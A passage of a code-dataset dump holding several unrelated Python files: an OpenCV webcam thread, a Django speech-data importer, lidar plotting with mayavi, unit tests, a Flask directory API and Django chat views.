Closest Target Value.py","file_name":"1478. Closest Target Value.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"67301376","text":"#!/usr/bin/env python\n# From https://gist.github.com/allskyee/7749b9318e914ca45eb0a1000a81bf56\n# This works for USB camera. Not for the Raspberry Pi Camera.\n\nfrom threading import Thread, Lock\nimport cv2\n\nclass WebcamVideoStream :\n def __init__(self, src=0, width=640, height=480) :\n self.stream = cv2.VideoCapture(src)\n self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width) # modified for opencv v3\n self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\n (self.grabbed, self.frame) = self.stream.read()\n self.started = False\n self.read_lock = Lock()\n\n def start(self) :\n if self.started :\n print(\"already started!\")\n return None\n self.started = True\n self.thread = Thread(target=self.update, args=())\n self.thread.start()\n return self\n\n def update(self) :\n while self.started :\n (grabbed, frame) = self.stream.read()\n with self.read_lock:\n self.grabbed, self.frame = grabbed, frame\n\n def read(self) :\n with self.read_lock:\n frame = self.frame.copy()\n return frame\n\n def stop(self) :\n self.started = False\n self.thread.join()\n\n def __exit__(self, exc_type, exc_value, traceback) :\n self.stream.release()\n\nif __name__ == \"__main__\" :\n vs = WebcamVideoStream().start()\n while True :\n frame = vs.read()\n cv2.imshow('webcam', frame)\n \n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n break\n\n vs.stop()\n cv2.destroyAllWindows()\n","sub_path":"opencv_usb_camera_multithread.py","file_name":"opencv_usb_camera_multithread.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"562302373","text":"import http.client\nimport json\nfrom os.path import join\nfrom urllib.parse import quote\n\nfrom django.conf import settings\nfrom django.core.management import call_command\nfrom django.core.management.base import BaseCommand\nfrom textgrid import TextGrid\n\n\nfrom 臺灣言語資料庫.資料模型 import 來源表\nfrom 臺灣言語資料庫.資料模型 import 影音表\nfrom 臺灣言語資料庫.資料模型 import 版權表\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **參數):\n call_command('顯示資料數量')\n\n 公家內容 = {\n '收錄者': 來源表.objects.get_or_create(名='系統管理員')[0].編號(),\n '來源': 來源表.objects.get_or_create(名='Pigu')[0].編號(),\n '版權': 版權表.objects.get_or_create(版權='會使公開')[0].pk,\n '種類': '語句',\n '語言腔口': '閩南語',\n '著作所在地': '臺北',\n '著作年': '2016',\n }\n 資料目錄 = join(settings.BASE_DIR, 'data')\n\n 匯入數量 = 0\n for 檔名 in ['a001-2', 'a002-2', 'a003-2', 'a004-2', 'a005', 'a006', 'b007']:\n with open(join(資料目錄, 檔名 + '.TextGrid')) as fp:\n grid = TextGrid(fp.read())\n for tier in grid:\n json資料 = []\n for 開始時間, 結束時間, 內容 in (tier.simple_transcript):\n if 內容.strip() not in ['sounding', 'silent']:\n json資料.append({\n '內容': self.揣分詞(內容),\n '語者': '無註明',\n '開始時間': str(float(開始時間) - 0.10),\n '結束時間': str(float(結束時間) + 0.15),\n })\n 影音內容 = {'影音所在': join(資料目錄, 檔名 + '.wav')}\n 影音內容.update(公家內容)\n 影音 = 影音表.加資料(影音內容)\n\n 聽拍內容 = {'聽拍資料': json資料}\n 聽拍內容.update(公家內容)\n 影音.寫聽拍(聽拍內容)\n\n 匯入數量 += 1\n if 匯入數量 % 100 == 0:\n print('匯入第{}筆:'.format(匯入數量))\n\n call_command('顯示資料數量')\n\n def 揣分詞(self, 音標):\n conn = http.client.HTTPConnection(\"140.109.16.144\")\n conn.request(\n \"GET\",\n \"/%E6%A8%99%E6%BC%A2%E5%AD%97%E9%9F%B3%E6%A8%99?%E6%9F%A5%E8%A9%A2%E8%85%94%E5%8F%A3=%E9%96%A9%E5%8D%97%E8%AA%9E&%E6%9F%A5%E8%A9%A2%E8%AA%9E%E5%8F%A5=\" +\n quote(音標)\n )\n r1 
= conn.getresponse()\n if r1.status != 200:\n print(r1.status, r1.reason)\n print(音標)\n raise RuntimeError()\n data1 = r1.read() # This will return entire content.\n return json.loads(data1.decode('utf-8'))['分詞']\n","sub_path":"praat/management/commands/匯入tan5.py","file_name":"匯入tan5.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"572636652","text":"from bert import ODQA\n\n\nmodel = ODQA('model')\n\nwith open(\"content.txt\", \"r\") as data:\n content = data.read()\n\nquestion = input(\"Enter Your Question: \")\n\nanswer = model.predict(content,question)\n\nprint(answer['answer'])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603597141","text":"import os, requests, logging\nfrom django.core.management.base import BaseCommand, CommandError\nfrom ...actions import create_asset, sync_with_github\nfrom ...tasks import async_sync_with_github\nfrom ...models import Asset\n\nlogger = logging.getLogger(__name__)\n\nHOST_ASSETS = 'https://assets.breatheco.de/apis'\n\n\nclass Command(BaseCommand):\n help = 'Sync exercises and projects from old breathecode'\n\n def add_arguments(self, parser):\n parser.add_argument('entity', type=str)\n parser.add_argument(\n '--override',\n action='store_true',\n help='Delete and add again',\n )\n parser.add_argument('--limit',\n action='store',\n dest='limit',\n type=int,\n default=0,\n help='How many to import')\n\n def handle(self, *args, **options):\n try:\n func = getattr(self, options['entity'], 'entity_not_found')\n except TypeError:\n print(f'Sync method for {options[\"entity\"]} no Found!')\n func(options)\n\n def projects(self, *args, **options):\n projects = Asset.objects.filter(asset_type='PROJECT')\n for p in projects:\n async_sync_with_github.delay(p.slug)\n","sub_path":"breathecode/registry/management/commands/resync_registry.py","file_name":"resync_registry.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"488985166","text":"#######################################################################\n## Objeto que representa un comando \t ##\n#######################################################################\n\n## Importa objeto padre\nfrom objects import Thing\n\n## Definicion del objeto\nclass Command(Thing):\n \n ## Constructor\n def __init__(self, alias):\n ## Inicializa el objeto padre\n Thing.__init__(self)\n\n ## Fija el nombre del comando\n self.alias = alias","sub_path":"objects/Command.py","file_name":"Command.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"427768027","text":"\n\nimport numpy as np\nimport mayavi.mlab as mlab\n\n\n# pts_mode='sphere'\ndef draw_lidar(\n pc,\n color=None,\n fig=None,\n bgcolor=(0, 0, 0),\n pts_scale=0.3,\n pts_mode=\"sphere\",\n pts_color=None,\n color_by_intensity=False,\n pc_label=False,\n):\n \"\"\" Draw lidar points\n Args:\n pc: numpy array (n,3) of XYZ\n color: numpy array (n) of intensity or whatever\n fig: mayavi figure handler, if None create new one otherwise will use it\n Returns:\n fig: created or used fig\n \"\"\"\n # ind = (pc[:,2]< -1.65)\n # pc = pc[ind]\n pts_mode = \"point\"\n print(\"====================\", pc.shape)\n if fig is None:\n fig = 
mlab.figure(\n figure=None, bgcolor=bgcolor, fgcolor=None, engine=None, size=(1600, 1000)\n )\n if color is None:\n color = pc[:, 2]\n if pc_label:\n color = pc[:, 4]\n if color_by_intensity:\n color = pc[:, 2]\n\n mlab.points3d(\n pc[:, 0],\n pc[:, 1],\n pc[:, 2],\n color,\n color=pts_color,\n mode=pts_mode,\n colormap=\"gnuplot\",\n scale_factor=pts_scale,\n figure=fig,\n )\n\n # draw origin\n mlab.points3d(0, 0, 0, color=(1, 1, 1), mode=\"sphere\", scale_factor=0.2)\n\n # draw axis\n axes = np.array(\n [[2.0, 0.0, 0.0, 0.0], [0.0, 2.0, 0.0, 0.0], [0.0, 0.0, 2.0, 0.0]],\n dtype=np.float64,\n )\n mlab.plot3d(\n [0, axes[0, 0]],\n [0, axes[0, 1]],\n [0, axes[0, 2]],\n color=(1, 0, 0),\n tube_radius=None,\n figure=fig,\n )\n mlab.plot3d(\n [0, axes[1, 0]],\n [0, axes[1, 1]],\n [0, axes[1, 2]],\n color=(0, 1, 0),\n tube_radius=None,\n figure=fig,\n )\n mlab.plot3d(\n [0, axes[2, 0]],\n [0, axes[2, 1]],\n [0, axes[2, 2]],\n color=(0, 0, 1),\n tube_radius=None,\n figure=fig,\n )\n\n # draw fov (todo: update to real sensor spec.)\n fov = np.array(\n [[20.0, 20.0, 0.0, 0.0], [20.0, -20.0, 0.0, 0.0]], dtype=np.float64 # 45 degree\n )\n\n mlab.plot3d(\n [0, fov[0, 0]],\n [0, fov[0, 1]],\n [0, fov[0, 2]],\n color=(1, 1, 1),\n tube_radius=None,\n line_width=1,\n figure=fig,\n )\n mlab.plot3d(\n [0, fov[1, 0]],\n [0, fov[1, 1]],\n [0, fov[1, 2]],\n color=(1, 1, 1),\n tube_radius=None,\n line_width=1,\n figure=fig,\n )\n\n # draw square region\n TOP_Y_MIN = -20\n TOP_Y_MAX = 20\n TOP_X_MIN = 0\n TOP_X_MAX = 40\n TOP_Z_MIN = -2.0\n TOP_Z_MAX = 0.4\n\n x1 = TOP_X_MIN\n x2 = TOP_X_MAX\n y1 = TOP_Y_MIN\n y2 = TOP_Y_MAX\n mlab.plot3d(\n [x1, x1],\n [y1, y2],\n [0, 0],\n color=(0.5, 0.5, 0.5),\n tube_radius=0.1,\n line_width=1,\n figure=fig,\n )\n mlab.plot3d(\n [x2, x2],\n [y1, y2],\n [0, 0],\n color=(0.5, 0.5, 0.5),\n tube_radius=0.1,\n line_width=1,\n figure=fig,\n )\n mlab.plot3d(\n [x1, x2],\n [y1, y1],\n [0, 0],\n color=(0.5, 0.5, 0.5),\n tube_radius=0.1,\n line_width=1,\n figure=fig,\n )\n mlab.plot3d(\n [x1, x2],\n [y2, y2],\n [0, 0],\n color=(0.5, 0.5, 0.5),\n tube_radius=0.1,\n line_width=1,\n figure=fig,\n )\n\n # mlab.orientation_axes()\n mlab.view(\n azimuth=180,\n elevation=70,\n focalpoint=[12.0909996, -1.04700089, -2.03249991],\n distance=62.0,\n figure=fig,\n )\n return fig\n\n\ndef load_res_data(filename):\n data_list = []\n with open(filename, \"r\") as f:\n for line in f.readlines():\n line = line.rstrip()\n if len(line) == 0:\n continue\n #data = np.array([float(s) for s in line.split(\" \")])\n data_list.append( np.fromstring(line, dtype=float, sep=' ') )\n return np.stack(data_list, axis = 0)\n\n\n# load detecting results with \npts_res = load_res_data('res_03.txt')\n#draw_lidar(pts_res)\nchoice = np.where(pts_res[:,3]>0)\npts_car = pts_res[choice, :].squeeze()\n#pts_car = np.multiply(pts_res, pts_res[:,3].reshape(-1,1))\n#draw_lidar(pts_car)\n\n\n\nfile_dir = \"train_03.bin\"\npc = np.fromfile(file_dir, dtype=np.float32).reshape(-1, 4) # load velodyne data\n#x_flag = pc[:,0]>0\n#pc = pc[x_flag, :]\n#fig = draw_lidar(pc)\n\n\n'''\n\nmlab.close()\n\n'''\n\n'''\n\n# Create the data.\nfrom numpy import pi, sin, cos, mgrid\ndphi, dtheta = pi/250.0, pi/250.0\n[phi,theta] = mgrid[0:pi+dphi*1.5:dphi,0:2*pi+dtheta*1.5:dtheta]\nm0 = 4; m1 = 3; m2 = 2; m3 = 3; m4 = 6; m5 = 2; m6 = 6; m7 = 4;\nr = sin(m0*phi)**m1 + cos(m2*phi)**m3 + sin(m4*theta)**m5 + cos(m6*theta)**m7\nx = r*sin(phi)*cos(theta)\ny = r*cos(phi)\nz = r*sin(phi)*sin(theta)\n\n# View it.\nfrom mayavi import mlab\ns = mlab.mesh(x, 
y, z)\nmlab.show()\n\n\n'''\n\n\n","sub_path":"mycode/test_pts.py","file_name":"test_pts.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"308961128","text":"import unittest\nimport DataHelper as dh\nfrom collections import OrderedDict\n\n# AAA: assign, action and assert\nclass TestDataHelper(unittest.TestCase):\n def test_crud_fish(self):\n # assign for add\n data_helper = dh.DataHelper()\n amount_was = data_helper.get_fishes().__len__()\n fish = OrderedDict([('FishName', 'Salmon'), ('Description', 'from Alaska'), ('ImageUrl', '')])\n\n # action for add\n data_helper.add_fish(fish['FishName'], fish['Description'], fish['ImageUrl'])\n\n # assert for add\n last_fish = data_helper.get_fishes()[amount_was]\n\n last_fish_props = []\n for prop in last_fish:\n last_fish_props.append(prop)\n last_fish_props = last_fish_props[1:]\n\n fish_props = fish.values()\n\n self.assertTrue(set(last_fish_props) == set(fish_props))\n self.assertEquals(amount_was, data_helper.get_fishes().__len__() - 1)\n\n # assign for update\n new_fish = OrderedDict([('FishName', 'Sharky'), ('Description', 'from Cat Eak cartoon'), ('ImageUrl', '')])\n last_id = data_helper.get_fishes()[amount_was][0]\n\n # action for update\n data_helper.update_fish(last_id, new_fish['FishName'], new_fish['Description'], new_fish['ImageUrl'])\n\n # assign for update\n last_fish = data_helper.get_fishes()[amount_was]\n\n last_fish_props = []\n for prop in last_fish:\n last_fish_props.append(prop)\n last_fish_props = last_fish_props[1:]\n\n new_fish_props = new_fish.values()\n\n self.assertTrue(set(last_fish_props) == set(new_fish_props))\n\n # action for remove\n data_helper.remove_fish(last_id)\n\n # assert for remove\n self.assertEqual(amount_was, data_helper.get_fishes().__len__())\n\n def test_crud_car(self):\n # assign for add\n data_helper = dh.DataHelper()\n amount_was = data_helper.get_cars().__len__()\n car = OrderedDict([('Brand', 'BMW'), ('Model', 'M5'), ('Color', 'Black'), ('Year', 2012), ('ImageUrl', '')])\n\n # action for add\n data_helper.add_car(car['Brand'], car['Model'], car['Color'], car['Year'], car['ImageUrl'])\n\n # assert for add\n last_car = data_helper.get_cars()[amount_was]\n\n last_car_props = []\n for prop in last_car:\n last_car_props.append(prop)\n last_car_props = last_car_props[1:]\n\n car_props = car.values()\n\n self.assertTrue(set(last_car_props) == set(car_props))\n self.assertEquals(amount_was, data_helper.get_cars().__len__() - 1)\n\n # assign for update\n new_car = OrderedDict(\n [('Brand', 'Mercedes'), ('Model', 'C200'), ('Color', 'While'), ('Year', 2012), ('ImageUrl', '')])\n last_id = data_helper.get_cars()[amount_was][0]\n\n # action for update\n data_helper.update_car(last_id, new_car['Brand'], new_car['Model'], new_car['Color'], new_car['Year'],\n new_car['ImageUrl'])\n\n # assert for update\n last_car = data_helper.get_cars()[amount_was]\n\n last_car_props = []\n for prop in last_car:\n last_car_props.append(prop)\n last_car_props = last_car_props[1:]\n\n new_car_props = new_car.values()\n\n self.assertTrue(set(last_car_props) == set(new_car_props))\n self.assertEquals(amount_was, data_helper.get_cars().__len__() - 1)\n\n # action for remove\n data_helper.remove_car(last_id)\n\n # assert for remove\n self.assertEqual(amount_was, data_helper.get_cars().__len__())\n\nif __name__ == '__main__':\n 
unittest.main()\n","sub_path":"TestDataHelper.py","file_name":"TestDataHelper.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"434453779","text":"\"\"\"Author: Piotr Orpel, 2020\"\"\"\nimport json\nfrom copy import deepcopy\n\nfrom app_code.common.model.exceptions import OptionalFieldNotFound, MissingField, NoDefaultValue, InvalidData, \\\n InvalidField\n\n\nclass Model(object):\n\n def __init__(self, key=None, object_name=None, description='', required=True,\n default=None, hidden=False):\n \"\"\"Model initialization\n\n Args:\n key (str or None): key under which this model expects data and is saved.\n object_name (str or None): name that is to be used in the swagger for this model\n description (str): description of this model\n required (bool): flag if this field is required in the data\n default (bool or None): default value for this model\n hidden (bool): flag if this field is hidden in swagger\n \"\"\"\n self.key = key\n self.object_name = object_name\n self.description = description\n self.required = required\n self.default_value = default\n if self.default_value is not None:\n self.required = False\n self.value = default\n self.hidden = hidden\n\n self.conditions = []\n self.converter = None\n\n def with_condition(self, condition):\n \"\"\"Adds condition that is verified during data loading.\n\n Args:\n condition (function): function that defines a condition which the data must pass to be loaded\n\n Returns:\n self\n\n Examples:\n - Defining condition - in this case a simple length check - arguments are fixed and must be provided as\n in example.\n\n def condition(key, data):\n if len(data) > 256:\n raise InvalidData\n\n - Adding condition:\n model.with_condition(condition)\n \"\"\"\n self.conditions.append(condition)\n return self\n\n def with_converter(self, converter):\n \"\"\"Adds converter that is executed on loaded data before processing.\n\n Args:\n converter (function): function that converts loaded data\n\n Returns:\n self\n\n Examples:\n - Defining converter - arguments are fixed and must be provided as in example:\n def converter(data):\n return int(data)\n\n model.with_converter(converter)\n \"\"\"\n self.converter = converter\n return self\n\n @property\n def json(self):\n \"\"\"Returns JSON formatted string\"\"\"\n return json.dumps(self.dict())\n\n def swagger_type(self):\n \"\"\"Returns swagger data type of this object\"\"\"\n raise NotImplementedError\n\n def swagger(self, prop, only_value=False, force_hidden=False):\n \"\"\"Returns specific definitions for given model that are to be saved in the swagger\"\"\"\n raise NotImplementedError\n\n def swagger_definition(self, only_value=False, force_hidden=False):\n \"\"\"Creates swagger definition for the model\"\"\"\n if self.hidden and not force_hidden:\n return\n prop = {\n 'type': self.swagger_type(),\n }\n if self.description is not None:\n prop['description'] = self.description\n\n self.swagger(prop)\n\n if self.key is not None or self.object_name is not None:\n return {self.key or self.object_name: prop} if not only_value else prop\n return prop\n\n def dict(self, data=None):\n \"\"\"Creates dictionary containing value stored in the model.\n\n If model has a key defined then value returned is in format:\n {self.key: self.value}\n else:\n self.value\n \"\"\"\n data = data or {}\n if self.key:\n data[self.key] = self.value\n return data\n return self.value\n\n def load(self, data, load_hidden=True, parent_key=''):\n 
\"\"\"Loads data to the model\n\n Args:\n data: data to be loaded\n load_hidden (bool): flag if should load hidden from swagger variables in the model\n parent_key (string): internal argument\n \"\"\"\n # Set default value\n self.value = self.default_value if not isinstance(self.default_value, list) or not isinstance(\n self.default_value, dict) else deepcopy(self.default_value)\n try:\n # Skip hidden elements\n if not load_hidden and self.hidden:\n return\n\n if not self.required and self.default_value is None and not self.key in data:\n self.value = OptionalFieldNotFound\n return\n # If data schema has a key defined verify data\n\n if self.key:\n # Set parent key reference name\n parent_key = self.key if parent_key == '' else f'{parent_key}.{self.key}'\n\n # Check if key is in data\n if data is None or self.key not in data:\n if self.required:\n raise MissingField(parent_key)\n if self.default_value is None:\n raise NoDefaultValue(parent_key)\n return\n # Check if data is a dictionary\n if not isinstance(data, dict):\n raise InvalidData()\n\n dat = data[self.key] if self.key else data\n\n if self.converter:\n dat = self.converter(dat)\n\n for condition in self.conditions:\n condition(parent_key, dat)\n\n self._load(\n data=dat,\n load_hidden=load_hidden,\n parent_key=parent_key\n )\n except (InvalidField, NoDefaultValue) as e:\n self.value = None\n raise e\n except MissingField as e:\n self.value = None\n # TODO: RETHINK IF SHOULD RAISE ERROR ONLY WHEN REQUIRED\n if self.required:\n raise e\n except (AttributeError, TypeError, ValueError) as e:\n print(e)\n raise InvalidData\n\n def _load(self, data, load_hidden=True, parent_key=''):\n raise NotImplementedError\n\n def get_element(self, name=None, node=False):\n \"\"\"Retrieves specified element from schema.\n\n Args:\n name (str or list of str): name or path leading to requested element\n node (bool): flag if expects schema element or it's value\n\n Returns:\n\n \"\"\"\n if self.value == OptionalFieldNotFound:\n return self.value\n if not name or len(name) == 0:\n if node:\n return self\n value = self.dict()\n return value.get(self.key, value) if isinstance(value, dict) else value\n\n # Get current element's name\n cur_name = name.pop(0) if isinstance(name, list) else name\n\n # Get current element's value\n item = self._get_element_value(cur_name)\n # Handle nested elements\n if isinstance(item, Model):\n if isinstance(name, list):\n return item.get_element(name, node)\n if node:\n return item\n value = item.dict()\n return value.get(item.key, value) if isinstance(value, dict) else value\n return item\n\n def _get_element_value(self, name):\n return self.value\n\n def print_tree(self, indent_numb=0):\n \"\"\"Prints data\"\"\"\n indent = ''.join('\\t' for _ in range(indent_numb))\n if self.key:\n print(f'{indent}key: {self.key}; value: {self.value}')\n\n def new(self):\n \"\"\"Returns new instance of given model, doesn't copy values\"\"\"\n raise NotImplementedError\n","sub_path":"app_code/common/model/types/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"383622488","text":"from cyder.cydns.nameserver.nameserver.forms import NameserverForm\nfrom cyder.cydns.nameserver.nameserver.models import Nameserver\nfrom cyder.cydns.nameserver.views import *\n\n\nclass NSView(object):\n model = Nameserver\n form_class = NameserverForm\n queryset = Nameserver.objects.all()\n\n\nclass NSDeleteView(NSView, 
CydnsDeleteView):\n    \"\"\" \"\"\"\n\n\nclass NSDetailView(NSView, CydnsDetailView):\n    template_name = \"nameserver/nameserver_detail.html\"\n\n\nclass NSListView(NSView, CydnsListView):\n    \"\"\" \"\"\"\n    template_name = \"nameserver/nameserver_list.html\"\n\n\nclass NSCreateView(NSView, CydnsCreateView):\n    \"\"\" \"\"\"\n\n\nclass NSUpdateView(NSView, CydnsUpdateView):\n    \"\"\" \"\"\"\n","sub_path":"cyder/cydns/nameserver/nameserver/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"201632771","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\n\"\"\"\n@version: 0.1\n@author: Yang Reid\n@license: Apache Licence \n@contact: yangtao584@126.com\n@site: http://www.phpgao.com\n@software: PyCharm Community Edition\n@file: orderDict.py\n@time: 2018/1/15 19:10\n\"\"\"\nimport collections\n\ndef func():\n\n\n    print('Regular dictionary:')\n    d = {}\n    d['a'] = 'A'\n    d['b'] = 'B'\n    d['c'] = 'C'\n    d['d'] = 'D'\n    d['e'] = 'E'\n\n    for k, v in d.items():\n        print(k, v)\n\n    print('\\nOrderedDict:')\n    d = collections.OrderedDict()\n    d['a'] = 'A'\n    d['b'] = 'B'\n    d['c'] = 'C'\n    d['d'] = 'D'\n    d['e'] = 'E'\n\n    for k, v in d.items():\n        print(k, v)\n\n\n\n\n\nif __name__ == '__main__':\n    func()","sub_path":"advancedDict/orderDict.py","file_name":"orderDict.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205571409","text":"import datetime\nfrom typing import Tuple, Any\n\nfrom flask import jsonify, request, Blueprint\nfrom flask_jwt_extended import jwt_optional\nfrom marshmallow import ValidationError\n\nfrom app import db\nfrom app.models import Directory, Project\nfrom app.schemas import DirectorySchema\nfrom app.utils.helpers import get_user, get_sub_directory_from_path\nfrom app.utils.responses import make_resp, NOT_FOUND, UNAUTHORIZED, FORBIDDEN, NO_JSON\n\ndirectory_bp = Blueprint(\"directories\", __name__)\n\ndirectory_schema = DirectorySchema()\nin_directory_schema = DirectorySchema(exclude=(\"parent_id\",))\n\n# @directory_bp.route('/project/<int:project_id>/directories/', methods=[\"POST\"])\n# @directory_bp.route('/project/<string:project_name>/directories/', methods=[\"POST\"])\n# @jwt_optional\n# def create_project_directory(project_id: int = None, project_name: str = None) -> Tuple[Any, int]:\n#     project = Project.query.get(project_id) if project_id else Project.query.filter(Project.name == project_name).first()\n#     if not project:\n#         return make_resp(NOT_FOUND)\n#     if not get_user():\n#         return make_resp(UNAUTHORIZED)\n#     if project.user != get_user():\n#         return make_resp(FORBIDDEN)\n#     if not request.is_json:\n#         return make_resp(NO_JSON)\n#     try:\n#         directory = directory_schema.load(request.get_json())\n#         project.last_modified = datetime.datetime.now()\n#     except ValidationError as errors:\n#         return errors.messages, 422\n#     db.session.add(directory)\n#     db.session.commit()\n#     return jsonify(data=directory_schema.dump(directory)), 200\n\n@directory_bp.route(\"/project/<int:project_id>/create-directory-in/\", methods=[\"POST\"])\n@directory_bp.route(\"/project/<string:project_name>/create-directory-in/\", methods=[\"POST\"])\n@directory_bp.route(\"/project/<int:project_id>/create-directory-in/<path:parent_dir_path>/\", methods=[\"POST\"])\n@directory_bp.route(\"/project/<string:project_name>/create-directory-in/<path:parent_dir_path>/\", methods=[\"POST\"])\n@jwt_optional\ndef create_directory_with_path(project_id: int = None, project_name: str = None, parent_dir_path: str = \"\") -> Tuple[Any, int]:\n    project = 
Project.query.get(project_id) if project_id else Project.query.filter(\n        Project.name == project_name.lower()).first()\n    if not get_user():\n        return make_resp(UNAUTHORIZED)\n    if not project:\n        return make_resp(NOT_FOUND)\n    if project.user != get_user():\n        return make_resp(FORBIDDEN)\n    if not request.is_json:\n        return make_resp(NO_JSON)\n    parent_dir = get_sub_directory_from_path(project.root_directory, parent_dir_path)\n    if not parent_dir:\n        return make_resp(NOT_FOUND)\n    try:\n        directory = in_directory_schema.load(request.get_json())\n        directory.parent = parent_dir\n        project.last_modified = datetime.datetime.utcnow()\n    except ValidationError as errors:\n        return errors.messages, 422\n    db.session.add(directory)\n    db.session.commit()\n    return jsonify(data=directory_schema.dump(directory)), 200\n\n\n@directory_bp.route(\"/directory/<int:id>/\", methods=[\"GET\", \"PUT\", \"DELETE\"])\n@jwt_optional\ndef directory(id: int) -> Tuple[Any, int]:\n    directory = Directory.query.get(id)\n    if not directory:\n        return make_resp(NOT_FOUND)\n    if request.method == \"GET\":\n        return jsonify(data=directory_schema.dump(directory)), 200\n    elif request.method == \"PUT\":\n        if directory.project.user != get_user():\n            return make_resp(FORBIDDEN)\n        if not request.is_json:\n            return make_resp(NO_JSON)\n        try:\n            directory = directory_schema.load(request.get_json(), instance=directory, partial=True)\n            directory.project.last_modified = datetime.datetime.utcnow()\n        except ValidationError as errors:\n            return errors.messages, 422\n        db.session.commit()\n        return jsonify(data=directory_schema.dump(directory)), 200\n    elif request.method == \"DELETE\":\n        if directory.project.user != get_user():\n            return make_resp(FORBIDDEN)\n        db.session.delete(directory)\n        db.session.commit()\n        return make_resp(({\"msg\": \"success\"}, 200))\n","sub_path":"app/blueprints/directories.py","file_name":"directories.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546695540","text":"# vim: set ts=8 sw=4 sts=4 et ai:\nfrom django.core.cache import cache\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import get_object_or_404\nfrom osso.core.decorators import login_with_profile_required\nfrom osso.userchat.filters import pre_send_run\nfrom osso.userchat.models import CACHE_TIME, Channel, Message\nfrom osso.xhr import JsonResponse\n\n\ndef messages_to_json(messages, user=None):\n    '''\n    Convert a list of channel messages to something usable, JSON-wise.\n    '''\n    json = []\n    for msg in messages:\n        value = {\n            'id': msg.id,\n            'time': msg.timestamp.strftime('%H:%M'),\n            'body': msg.body,\n        }\n        if msg.sender is not None:\n            value['sender'] = msg.sender.username\n\n        extra_class = []\n        if user == msg.sender:\n            extra_class.append('is-my-message')\n        if len(extra_class):\n            value['extra_class'] = ' '.join(extra_class)\n        json.append(value)\n    return json\n\n\ndef qarg_to_pairs(string_q):\n    '''\n    Convert a string of dash-delimited integers to a list of 2-tuples.\n    E.g. 
1-0-2-0 to [(1, 0), (2, 0)].\n '''\n try:\n tmp = [int(i) for i in string_q.split('-')]\n except ValueError:\n return []\n if len(tmp) % 2 != 0:\n return []\n\n ret = []\n for i in range(0, len(tmp), 2):\n ret.append((tmp[i], tmp[i + 1]))\n return ret\n\n\n@login_with_profile_required\ndef channel(request, channel_id):\n # The optional argument gt=\n try:\n last_message_id = int(request.GET.get('gt', 0))\n except ValueError:\n last_message_id = 0\n\n # Get all necessary prerequisites.\n group_ids = list(request.user.groups.values_list('id', flat=True))\n exclude_empty_sender = False\n try:\n relation_id = request.active_relation_id\n except AttributeError:\n relation_id = request.user.authenticatablecontact.relation_id\n channels = Channel.objects.filter(relation__id=relation_id,\n groups__in=group_ids).distinct()\n channel = get_object_or_404(channels, pk=channel_id)\n\n # Add message if this is a post request.\n if request.method == 'POST':\n try:\n body = request.POST.get('body')\n except IOError:\n # As this is loaded through AJAX asynchronously, it can\n # happen that the client disconnects during the POST:\n # IOError: Client read error (Timeout?)\n return JsonResponse(request, '[]')\n\n if body is not None:\n body = body.strip()\n if body != '':\n channel.create_message(body=body, sender=request.user)\n\n # Get messages greater than last_message_id.\n message_qs = channel.messages.filter(id__gt=last_message_id)\n if exclude_empty_sender:\n message_qs = message_qs.exclude(sender=None)\n if hasattr(message_qs, 'prefetch_related'):\n message_qs = message_qs.prefetch_related('sender')\n else:\n message_qs = message_qs.select_related('sender')\n messages = message_qs.order_by('timestamp').distinct()\n\n # Run it through the message filters.\n final_messages = []\n for message in messages:\n message = pre_send_run(message, channel_id=channel_id,\n group_ids=group_ids)\n if message:\n final_messages.append(message)\n\n json = messages_to_json(final_messages, user=request.user)\n return JsonResponse(request, json, compact=True)\n\n\n# Don't require login with profile here yet. First check it later on\n# when the cache tells us that there *are* new messages and we need to\n# fetch them. This saves us a query. For the userchat /multiq/ that's\n# pretty much, since a lot of users call this every couple of seconds.\ndef multiple_channels(request):\n # The argument q= holds the channel_id-gt_value tuples, e.g.\n # 1-0-2-45 means channel 1 from id 0 and channel 2 from id 45.\n pairs = qarg_to_pairs(request.GET.get('q'))\n\n # Get all necessary prerequisites first when we need them.\n json = {}\n relation_id, group_ids, exclude_empty_sender = None, None, False\n\n for channel_id, message_id in pairs:\n # The cache stores the last message id. 
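One cache key is kept per channel. 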
